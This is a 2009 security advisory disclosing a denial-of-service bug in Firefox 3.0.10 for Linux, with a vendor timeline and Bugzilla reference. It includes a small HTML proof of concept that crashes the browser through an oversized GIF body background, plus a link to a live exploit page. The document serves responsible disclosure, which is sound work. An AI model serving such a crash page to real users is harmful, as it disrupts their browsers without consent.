____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ | __)_ / \ \// ~ \/ | | \\ \___\ Y / | /_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_110$2009
------------------------------------------------------------------------
--------
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services
------------------------------------------------------------------------
--------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : June, 4th 2009
Location : Indonesia, Jakarta
web : http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl : Moderated
Impact : Browser will automatically shutdown
Where : From Remote
Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
http://www.wiretrip.net/rfp/policy.html
------------------------------------------------------------------------
--------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Firefox is a popular Internet browser from the Mozilla Corporation.
Application : Firefox for GNU/linux
version : Firefox/3.0.10 (X11; Linux i686; U; en)
Also affected for lower version (tested for version 3.0.8 at
Ubuntu 9.0.4)
URL : http://firefox.com
Bugzilla entry : https://bugzilla.mozilla.org/show_bug.cgi?id=496265
Description :
Firefox 3.0.10 (previous version) for GNU/Linux Operating systems are unable to
handle big size of GIF images rendering when it becomes a body backgrounds.
Just use a random size GIF files will crash firefox because of HTML body tag.
------------------------------------------------------------------------
--------
Exploit Code:
~~~~~~~~~~~~~~~~
<!-- Firefox 3.0.10 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3dips.echo.or.id
//-->
<html>
<head>
<title>Firefox Exploit</title>
<body background="exploit.gif">
</body>
</html>
live exploit :
http://y3dips.echo.or.id/tempe/ff310expl/
------------------------------------------------------------------------
--------
Timeline:
~~~~~~~~~
- 20 - 05 - 2009 bug found
- 04 - 06 - 2009 vendor contacted and adding entry to bugzilla
- 04 - 06 - 2009 vendor response, and there`s a potential patch
- 09 - 06 - 2009 advisory release
------------------------------------------------------------------------
--------
Shoutz:
~~~~~~~
~ my family (ana my wife and ali my son)
~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind "waraxe", str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
--------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ---------------------------------------
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum